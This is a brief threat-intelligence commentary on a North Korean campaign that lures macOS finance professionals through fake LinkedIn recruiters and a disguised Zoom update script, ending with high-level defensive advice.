North Korea Targets macOS Users in Latest Heist

The latest Sapphire Sleet operation marks a notable shift in the threat landscape, as North Korean actors move beyond Windows‑centric attacks to exploit macOS users. By masquerading a Zoom SDK update as a legitimate AppleScript, the group leverages the platform’s native scripting environment to bypass traditional antivirus defenses. The initial social‑engineering vector—fabricated recruiter outreach on LinkedIn—targets finance professionals who are prime holders of cryptocurrency assets, making the lure both credible and financially rewarding for the attackers.

State‑sponsored groups like Lazarus have refined their playbook over years, combining low‑cost human manipulation with sophisticated multi‑stage payload delivery. The use of native macOS tools such as `softwareupdate`, `curl`, and `osascript` allows the malware to blend in with legitimate system processes, while dynamic payload fetching evades static signature detection. This approach reflects a broader trend where adversaries weaponize trusted development ecosystems, forcing defenders to adopt behavior‑based monitoring and deeper telemetry on script execution.

Apple’s rapid rollout of Safari Safe Browsing filters and XProtect signatures demonstrates the importance of vendor collaboration in mitigating zero‑day campaigns. However, technical controls alone cannot eliminate the risk; organizations must reinforce security awareness, especially around unsolicited software requests on professional networks. Regular training, strict script execution policies, and centralized approval workflows for remote‑support tools are essential safeguards. As attackers continue to weaponize everyday collaboration platforms, a layered defense that blends technology with human vigilance will be the most effective countermeasure.